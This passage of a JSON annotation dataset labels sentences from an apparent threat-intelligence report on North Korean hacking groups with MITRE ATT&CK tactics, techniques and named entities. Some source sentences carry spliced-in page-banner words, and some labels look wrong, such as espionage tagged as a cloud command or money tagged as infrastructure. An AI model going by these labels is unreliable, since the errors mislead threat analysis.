"page_number": 25, "sentence_id": 193, "context_before": "AppleJeus primarily targets the cryptocurrency industry with the objective of stealing digital assets to support the regime’s financial needs.", "sentence_text": "The group employs tactics such as spear-phishing emails and fake cryptocurrency trading software to infiltrate systems and steal funds.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" }, { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Employs spear-phishing and fake trading software to infiltrate systems and steal funds", "entities": [ { "text": "fake cryptocurrency trading software ", "start": 60, "end": 97, "label": "MalwareTool" }, { "text": "employs ", "start": 10, "end": 18, "label": "Action" }, { "text": "spear-phishing ", "start": 34, "end": 49, "label": "Action" }, { "text": "infiltrate ", "start": 100, "end": 111, "label": "Action" }, { "text": "steal ", "start": 123, "end": 129, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p25-s194-e8559a", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 25, "sentence_id": 194, "context_before": "The group employs tactics such as spear-phishing emails and fake cryptocurrency trading software to infiltrate systems and steal funds.", "sentence_text": "AppleJeus was responsible for the theft of $50 million from Radiant Capital after an extended social engineering campaign targeting multiple Radiant employees.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Conducted social engineering campaign to steal $50 million from Radiant Capital", "entities": [ { "text": "AppleJeus ", "start": 0, "end": 10, "label": "ThreatActor" }, { "text": "$50 million", "start": 43, "end": 54, "label": "Infrastructure_Indicator" }, { "text": "Radiant Capital", "start": 60, "end": 75, "label": "Infrastructure_Indicator" }, { "text": "social engineering", "start": 94, "end": 112, "label": "Action" }, { "text": "theft ", "start": 34, "end": 40, "label": "Action" }, { "text": "targeting ", "start": 122, "end": 132, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p25-s195-fea138", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 25, "sentence_id": 195, "context_before": "AppleJeus was responsible for the theft of $50 million from Radiant Capital after an extended social engineering campaign targeting multiple Radiant employees.", "sentence_text": "Like TraderTraitor and CryptoCore, AppleJeus emerged following the increased attention brought by the Bangladesh Bank heist and challenges related to stealing and laundering traditional currency.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p25-s196-427579", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 25, "sentence_id": 196, "context_before": "Like TraderTraitor and CryptoCore, AppleJeus emerged following the increased attention brought by the Bangladesh Bank heist and challenges related to stealing and laundering traditional currency.", "sentence_text": "In March 2025, an established cryptocurrency security researcher’s accounts were revealed to belong to AppleJeus, demonstrating the insidious nature of the threat they present.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p25-s197-c3f728", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 25, "sentence_id": 197, "context_before": "In March 2025, an established cryptocurrency security researcher’s accounts were revealed to belong to AppleJeus, demonstrating the insidious nature of the threat they present.", "sentence_text": "While the group’s malware tools overlap with those of the TEMP.Hermit mission, their targeting profiles differ, suggesting likely same operators under the ever-incestuous Lab 110 or 110 Research Center, but with distinct operational goals.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Uses overlapping malware tools with TEMP.Hermit but has distinct targeting profiles", "entities": [ { "text": "TEMP.Hermit", "start": 58, "end": 69, "label": "ThreatActor" }, { "text": " Lab 110", "start": 170, "end": 178, "label": "ThreatActor" }, { "text": " 110 Research Center", "start": 181, "end": 201, "label": "ThreatActor" }, { "text": "malware tools", "start": 18, "end": 31, "label": "MalwareTool" }, { "text": "overlap ", "start": 32, "end": 40, "label": "Action" }, { "text": "differ", "start": 104, "end": 110, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p25-s198-86834c", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 25, "sentence_id": 198, "context_before": "While the group’s malware tools overlap with those of the TEMP.Hermit mission, their targeting profiles differ, suggesting likely same operators under the ever-incestuous Lab 110 or 110 Research Center, but with distinct operational goals.", "sentence_text": "CryptoCore (a.k.a.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p25-s199-720d82", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 25, "sentence_id": 199, "context_before": "CryptoCore (a.k.a.", "sentence_text": "Although not as advanced as TraderTraitor, this group is extremely 25 effective and stolen hundreds of millions of dollars in digital assets since we began tracking it.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Stolen hundreds of millions of dollars in digital assets", "entities": [ { "text": "TraderTraitor", "start": 28, "end": 41, "label": "ThreatActor" }, { "text": "stolen ", "start": 84, "end": 91, "label": "Action" }, { "text": "hundreds of millions of dollars in digital assets", "start": 91, "end": 140, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-79_mitre_report-p25-s200-d62501", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 25, "sentence_id": 200, "context_before": "Although not as advanced as TraderTraitor, this group is extremely 25 effective and stolen hundreds of millions of dollars in digital assets since we began tracking it.", "sentence_text": "The group’s modus operandi involves spear-phishing attacks to gain initial access, which often include masquerading as venture capitalists, followed by infiltrating networks toexfiltrate cryptocurrency wallets.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1566.002", "name": "Spearphishing Link" }, { "id": "T1537", "name": "Transfer Data to Cloud Account" } ], "procedure": "Uses spear-phishing while masquerading as venture capitalists to infiltrate networks and exfiltrate wallets", "entities": [ { "text": "cryptocurrency wallets", "start": 187, "end": 209, "label": "Infrastructure_Indicator" }, { "text": "spear-phishing", "start": 36, "end": 50, "label": "Action" }, { "text": "masquerading ", "start": 103, "end": 116, "label": "Action" }, { "text": "infiltrating ", "start": 152, "end": 165, "label": "Action" }, { "text": "exfiltrate", "start": 176, "end": 186, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p25-s201-fb6eee", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 25, "sentence_id": 201, "context_before": "The group’s modus operandi involves spear-phishing attacks to gain initial access, which often include masquerading as venture capitalists, followed by infiltrating networks toexfiltrate cryptocurrency wallets.", "sentence_text": "WORKFORCE IT HIDDEN AND SYNDICATE CYBER DPRK’S EXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p26-s202-faed24", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 26, "sentence_id": 202, "context_before": "WORKFORCE IT HIDDEN AND SYNDICATE CYBER DPRK’S EXPOSING", "sentence_text": "Moonstone Sleet (a.k.a. Storm-1789)\nMoonstone Sleet has been active since at least 2023 and has notable overlaps with historic TEMP.Hermit Comebacker malware.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Overlaps with historic TEMP.Hermit Comebacker malware", "entities": [ { "text": "Moonstone Sleet", "start": 0, "end": 15, "label": "ThreatActor" }, { "text": "Moonstone Sleet", "start": 36, "end": 51, "label": "ThreatActor" }, { "text": "Storm-1789", "start": 24, "end": 34, "label": "ThreatActor" }, { "text": "TEMP.Hermit", "start": 127, "end": 138, "label": "ThreatActor" }, { "text": "Comebacker malware", "start": 139, "end": 157, "label": "MalwareTool" }, { "text": "overlaps ", "start": 104, "end": 113, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p26-s203-71abfb", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 26, "sentence_id": 203, "context_before": "Moonstone Sleet (a.k.a. Storm-1789)\nMoonstone Sleet has been active since at least 2023 and has notable overlaps with historic TEMP.Hermit Comebacker malware.", "sentence_text": "Moonstone Sleet conducts financial operations targeting cryptocurrency and has developed its own strain of ransomware called FakePenny.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" }, { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Conducts financial operations targeting cryptocurrency and develops FakePenny ransomware", "entities": [ { "text": "Moonstone Sleet", "start": 0, "end": 15, "label": "ThreatActor" }, { "text": "FakePenny", "start": 125, "end": 134, "label": "MalwareTool" }, { "text": "cryptocurrency ", "start": 56, "end": 71, "label": "Infrastructure_Indicator" }, { "text": "developed ", "start": 79, "end": 89, "label": "Action" }, { "text": "conducts ", "start": 16, "end": 25, "label": "Action" }, { "text": "targeting ", "start": 46, "end": 56, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p26-s204-4bf2d3", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 26, "sentence_id": 204, "context_before": "Moonstone Sleet conducts financial operations targeting cryptocurrency and has developed its own strain of ransomware called FakePenny.", "sentence_text": "Notably, Moonstone Sleet also conducts defense-related espionage against the aerospace sector.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1591", "name": "Gather Victim Org Information" } ], "procedure": "Conducts defense-related espionage against aerospace sector", "entities": [ { "text": "Moonstone Sleet ", "start": 9, "end": 25, "label": "ThreatActor" }, { "text": "aerospace sector", "start": 77, "end": 93, "label": "Infrastructure_Indicator" }, { "text": "conducts defense-related espionage", "start": 30, "end": 64, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p26-s205-081249", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 26, "sentence_id": 205, "context_before": "Notably, Moonstone Sleet also conducts defense-related espionage against the aerospace sector.", "sentence_text": "We do not know Moonstone Sleet’s current organizational subordination.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p26-s206-e02916", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 26, "sentence_id": 206, "context_before": "We do not know Moonstone Sleet’s current organizational subordination.", "sentence_text": "WORKFORCE\nIT\nHIDDEN\nAND\nSYNDICATE\nCYBER\nDPRK’S\nEXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p27-s207-5db0c4", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 27, "sentence_id": 207, "context_before": "WORKFORCE\nIT\nHIDDEN\nAND\nSYNDICATE\nCYBER\nDPRK’S\nEXPOSING", "sentence_text": "The Destructive Mission North Korea probably maintains a destructive cyber attack capability for use in times of heightened tension or a wartime scenario.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" } ], "procedure": "Maintains destructive cyber attack capability for wartime scenarios", "entities": [ { "text": "North Korea ", "start": 24, "end": 36, "label": "ThreatActor" }, { "text": "maintains ", "start": 45, "end": 55, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p27-s209-016f79", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 27, "sentence_id": 209, "context_before": "APT45 (a.k.a.", "sentence_text": "The attackers deployed wiper malware that erased hard drives and rendered thousands of computers inoperable, while also launching DDoS attacks to overwhelm networks.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" }, { "id": "T1498", "name": "Network Denial of Service" } ], "procedure": "Deployed wiper malware to erase hard drives and launched DDoS attacks to overwhelm networks", "entities": [ { "text": "wiper malware ", "start": 23, "end": 37, "label": "MalwareTool" }, { "text": "deployed ", "start": 14, "end": 23, "label": "Action" }, { "text": "erased ", "start": 42, "end": 49, "label": "Action" }, { "text": "rendered thousands of computers inoperable", "start": 65, "end": 107, "label": "Action" }, { "text": "launching DDoS", "start": 120, "end": 134, "label": "Action" }, { "text": "overwhelm ", "start": 146, "end": 156, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p27-s210-b67ab1", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 27, "sentence_id": 210, "context_before": "The attackers deployed wiper malware that erased hard drives and rendered thousands of computers inoperable, while also launching DDoS attacks to overwhelm networks.", "sentence_text": "The attack was part of a broader 27 campaign aimed at destabilizing South Korea through coordinated cyber warfare.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" }, { "id": "T1498", "name": "Network Denial of Service" } ], "procedure": "Conducted coordinated cyber warfare to destabilize South Korea", "entities": [ { "text": "destabilizing ", "start": 54, "end": 68, "label": "Action" }, { "text": "South Korea", "start": 68, "end": 79, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-79_mitre_report-p27-s211-27d492", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 27, "sentence_id": 211, "context_before": "The attack was part of a broader 27 campaign aimed at destabilizing South Korea through coordinated cyber warfare.", "sentence_text": "These developments underscore APT45’s significant role in DPRK’s cyberoperations, blending espionage with financially motivated attacks to further the regime’s SYNDICATE objectives.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Blends espionage with financially motivated attacks for regime objectives", "entities": [ { "text": " APT45", "start": 29, "end": 35, "label": "ThreatActor" }, { "text": " DPRK", "start": 57, "end": 62, "label": "ThreatActor" }, { "text": "blending ", "start": 82, "end": 91, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p27-s212-d1d3e2", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 27, "sentence_id": 212, "context_before": "These developments underscore APT45’s significant role in DPRK’s cyberoperations, blending espionage with financially motivated attacks to further the regime’s SYNDICATE objectives.", "sentence_text": "Although this group does overlap heavily with espionage efforts, the usage of CYBER destructive activities led us to place the organization in this category.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" } ], "procedure": "Uses destructive activities alongside espionage", "entities": [ { "text": "usage of CYBER destructive activities", "start": 69, "end": 106, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p27-s213-bd8781", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 27, "sentence_id": 213, "context_before": "Although this group does overlap heavily with espionage efforts, the usage of CYBER destructive activities led us to place the organization in this category.", "sentence_text": "DPRK’S\nEXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p28-s214-0d308f", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 28, "sentence_id": 214, "context_before": "DPRK’S\nEXPOSING", "sentence_text": "The Espionage Mission North Korea’s cyber espionage mission looks most like other state-sponsored programs, with the objectives of gathering key foreign intelligence and information that will assist the regime.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1651", "name": "Cloud Administration Command" } ], "procedure": "Gathers foreign intelligence and information to assist regime", "entities": [ { "text": "North Korea", "start": 22, "end": 33, "label": "ThreatActor" }, { "text": "gathering ", "start": 131, "end": 141, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p28-s215-fb8838", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 28, "sentence_id": 215, "context_before": "The Espionage Mission North Korea’s cyber espionage mission looks most like other state-sponsored programs, with the objectives of gathering key foreign intelligence and information that will assist the regime.", "sentence_text": "APT43 has been active since at least 2012.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p28-s216-d6aa16", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 28, "sentence_id": 216, "context_before": "APT43 has been active since at least 2012.", "sentence_text": "APT43 employs sophisticated social engineering techniques, including spear-phishing campaigns, to harvest credentials and infiltrate networks.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Employs spear-phishing to harvest credentials and infiltrate networks", "entities": [ { "text": "APT43 ", "start": 0, "end": 6, "label": "ThreatActor" }, { "text": "employs ", "start": 6, "end": 14, "label": "Action" }, { "text": "harvest credentials", "start": 98, "end": 117, "label": "Action" }, { "text": "infiltrate", "start": 122, "end": 132, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p28-s217-25a8ca", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 28, "sentence_id": 217, "context_before": "APT43 employs sophisticated social engineering techniques, including spear-phishing campaigns, to harvest credentials and infiltrate networks.", "sentence_text": "These financially motivated operations enable APT43 to sustain its activities without state funding.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Conducts financially motivated operations to sustain activities", "entities": [ { "text": "APT43 ", "start": 46, "end": 52, "label": "ThreatActor" }, { "text": "sustain ", "start": 55, "end": 63, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p28-s218-aebbe7", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 28, "sentence_id": 218, "context_before": "These financially motivated operations enable APT43 to sustain its activities without state funding.", "sentence_text": "Konni (Opal Sleet, OSMIUM)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p28-s219-5b66ec", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 28, "sentence_id": 219, "context_before": "Konni (Opal Sleet, OSMIUM)", "sentence_text": "The sometimes-conflated Konni Group is a North Korean cyber espionage entity active since at least 2014 that primarily targets Russia.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p28-s220-d40cca", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 28, "sentence_id": 220, "context_before": "The sometimes-conflated Konni Group is a North Korean cyber espionage entity active since at least 2014 that primarily targets Russia.", "sentence_text": "It is known for deploying the KONNI Remote WORKFORCE Access Trojan (RAT)—a malware capable of capturing keystrokes, taking screenshots, and IT exfiltrating data from compromised systems.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1056", "name": "Input Capture" }, { "id": "T1113", "name": "Screen Capture" } ], "procedure": "Deploys KONNI RAT for keystroke logging, screenshots, and data exfiltration", "entities": [ { "text": "KONNI Remote WORKFORCE Access Trojan (RAT)", "start": 30, "end": 72, "label": "MalwareTool" }, { "text": "capturing keystrokes", "start": 94, "end": 114, "label": "Action" }, { "text": "taking screenshots", "start": 116, "end": 134, "label": "Action" }, { "text": " exfiltrating data", "start": 142, "end": 160, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p28-s221-7a739e", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 28, "sentence_id": 221, "context_before": "It is known for deploying the KONNI Remote WORKFORCE Access Trojan (RAT)—a malware capable of capturing keystrokes, taking screenshots, and IT exfiltrating data from compromised systems.", "sentence_text": "Although Konni is the name of the malware HIDDENused and not the name of the group itself, the name did catch on.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p28-s222-b3b4fd", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 28, "sentence_id": 222, "context_before": "Although Konni is the name of the malware HIDDENused and not the name of the group itself, the name did catch on.", "sentence_text": "This group AND has primarily targeted government agencies and organizations in South Korea and Russia.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p28-s223-e1a85a", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 28, "sentence_id": 223, "context_before": "This group AND has primarily targeted government agencies and organizations in South Korea and Russia.", "sentence_text": "For instance, in January 2022, Konni targeted Russian embassy diplomats with phishing SYNDICATE been observed exploiting vulnerabilities such as the WinRAR flaw (CVE-2023-38831) to CYBER disseminate its malware through weaponized documents.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Targeted Russian diplomats with phishing and exploited WinRAR vulnerability to disseminate malware", "entities": [ { "text": "Konni ", "start": 31, "end": 37, "label": "ThreatActor" }, { "text": "targeted ", "start": 37, "end": 46, "label": "Action" }, { "text": "Russian embassy diplomats", "start": 46, "end": 71, "label": "Infrastructure_Indicator" }, { "text": "CVE-2023-38831", "start": 162, "end": 176, "label": "Infrastructure_Indicator" }, { "text": "WinRAR ", "start": 149, "end": 156, "label": "Infrastructure_Indicator" }, { "text": "weaponized documents", "start": 219, "end": 239, "label": "Infrastructure_Indicator" }, { "text": "disseminate ", "start": 187, "end": 199, "label": "Action" }, { "text": "exploiting ", "start": 110, "end": 121, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p28-s224-c6e339", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 28, "sentence_id": 224, "context_before": "For instance, in January 2022, Konni targeted Russian embassy diplomats with phishing SYNDICATE been observed exploiting vulnerabilities such as the WinRAR flaw (CVE-2023-38831) to CYBER disseminate its malware through weaponized documents.", "sentence_text": "DPRK’S EXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p29-s225-5c8fcd", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 29, "sentence_id": 225, "context_before": "DPRK’S EXPOSING", "sentence_text": "Ruby Sleet (a.k.a. CERIUM)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p29-s226-15966f", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 29, "sentence_id": 226, "context_before": "Ruby Sleet (a.k.a. CERIUM)", "sentence_text": "Ruby Sleet, which was historically known as Bureau 325 and formerly CERIUM, was probably formed by operators of both APT43’s Japan-focused team and TEMP.Hermit.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Formed from operators of APT43's Japan team and TEMP.Hermit", "entities": [ { "text": "Ruby Sleet", "start": 0, "end": 10, "label": "ThreatActor" }, { "text": "Bureau 325", "start": 44, "end": 54, "label": "ThreatActor" }, { "text": "CERIUM", "start": 68, "end": 74, "label": "ThreatActor" }, { "text": " APT43", "start": 116, "end": 122, "label": "ThreatActor" }, { "text": "TEMP.Hermit", "start": 148, "end": 159, "label": "ThreatActor" }, { "text": "formed ", "start": 89, "end": 96, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p29-s227-eafc8d", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 29, "sentence_id": 227, "context_before": "Ruby Sleet, which was historically known as Bureau 325 and formerly CERIUM, was probably formed by operators of both APT43’s Japan-focused team and TEMP.Hermit.", "sentence_text": "We do not know whether this unit still exists or if it was reabsorbed by other units after completing its “special temporary project.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p29-s228-d6ddab", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 29, "sentence_id": 228, "context_before": "We do not know whether this unit still exists or if it was reabsorbed by other units after completing its “special temporary project.”", "sentence_text": "TEMP.Hermit (a.k.a. Diamond Sleet, Labyrinth Chollima, Selective Pisces, TA404)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p29-s229-e6a3ea", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 29, "sentence_id": 229, "context_before": "TEMP.Hermit (a.k.a. Diamond Sleet, Labyrinth Chollima, Selective Pisces, TA404)", "sentence_text": "TEMP.Hermit is closely associated with the AppleJeus cluster of activity, but maintains an espionage focus and has been active since at least 2013.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p29-s230-cc81a7", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 29, "sentence_id": 230, "context_before": "TEMP.Hermit is closely associated with the AppleJeus cluster of activity, but maintains an espionage focus and has been active since at least 2013.", "sentence_text": "TEMP.Hermit primarily targets defense, energy, financial, government, and technology sectors globally, aligning with North Korean strategic interests.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p29-s231-53a65e", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 29, "sentence_id": 231, "context_before": "TEMP.Hermit primarily targets defense, energy, financial, government, and technology sectors globally, aligning with North Korean strategic interests.", "sentence_text": "Their tactics include spear-phishing with job-themed lures, leading to malware deployment such as MISTPEN, a previously undocumented backdoor.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1203", "name": "Exploitation for Client Execution" } ], "procedure": "Uses spear-phishing with job lures to deploy MISTPEN backdoor", "entities": [ { "text": "MISTPEN", "start": 98, "end": 105, "label": "MalwareTool" }, { "text": "job-themed lures", "start": 42, "end": 58, "label": "Infrastructure_Indicator" }, { "text": "spear-phishing", "start": 22, "end": 36, "label": "Action" }, { "text": "malware deployment", "start": 71, "end": 89, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p29-s232-c4846a", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 29, "sentence_id": 232, "context_before": "Their tactics include spear-phishing with job-themed lures, leading to malware deployment such as MISTPEN, a previously undocumented backdoor.", "sentence_text": "TEMP.Hermit is probably responsible for the Operation DreamJob campaign that targeted defense and industrial job seekers during the COVID-19 pandemic.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1591", "name": "Gather Victim Org Information" } ], "procedure": "Targeted defense and industrial job seekers during COVID-19 pandemic", "entities": [ { "text": "TEMP.Hermit", "start": 0, "end": 11, "label": "ThreatActor" }, { "text": "defense and industrial job seekers ", "start": 86, "end": 121, "label": "Infrastructure_Indicator" }, { "text": "COVID-19 pandemic", "start": 132, "end": 149, "label": "Infrastructure_Indicator" }, { "text": "targeted ", "start": 77, "end": 86, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p29-s233-7c6b14", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 29, "sentence_id": 233, "context_before": "TEMP.Hermit is probably responsible for the Operation DreamJob campaign that targeted defense and industrial job seekers during the COVID-19 pandemic.", "sentence_text": "This group has also targeted security researchers who specialize in vulnerability research, suggesting that TEMP.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1591", "name": "Gather Victim Org Information" } ], "procedure": "Targeted security researchers specializing in vulnerability research", "entities": [ { "text": "security researchers", "start": 29, "end": 49, "label": "Infrastructure_Indicator" }, { "text": " vulnerability research", "start": 67, "end": 90, "label": "Infrastructure_Indicator" }, { "text": "targeted ", "start": 20, "end": 29, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p29-s234-be1779", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 29, "sentence_id": 234, "context_before": "This group has also targeted security researchers who specialize in vulnerability research, suggesting that TEMP.", "sentence_text": "Hermit may play a key role in developing North Korean malware.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Develops North Korean malware", "entities": [ { "text": " North Korean malware", "start": 40, "end": 61, "label": "MalwareTool" }, { "text": "developing ", "start": 30, "end": 41, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p29-s235-bbc160", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 29, "sentence_id": 235, "context_before": "Hermit may play a key role in developing North Korean malware.", "sentence_text": "This group is arguably the most critical within DPRK cyber operations—serving as the Swiss Army knife of the regime’s cyber capabilities and the primary entity behind the conflated “Lazarus Group” label.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Serves as primary entity behind Lazarus Group operations", "entities": [ { "text": "DPRK ", "start": 48, "end": 53, "label": "ThreatActor" }, { "text": "Lazarus Group", "start": 182, "end": 195, "label": "ThreatActor" }, { "text": "serving as", "start": 70, "end": 80, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p29-s236-a7096d", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 29, "sentence_id": 236, "context_before": "This group is arguably the most critical within DPRK cyber operations—serving as the Swiss Army knife of the regime’s cyber capabilities and the primary entity behind the conflated “Lazarus Group” label.", "sentence_text": "It overlaps across all areas of APT activity and now extends into IT worker operations in various forms.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p29-s237-8d9555", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 29, "sentence_id": 237, "context_before": "It overlaps across all areas of APT activity and now extends into IT worker operations in various forms.", "sentence_text": "This group is arguably the most critical within DPRK WORKFORCEcyber operations—serving as the Swiss Army knife IT of the regime’s cyber capabilities and the primary HIDDEN entity behind the conflated “Lazarus Group” label.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Serves as primary entity behind Lazarus Group operations", "entities": [ { "text": "DPRK ", "start": 48, 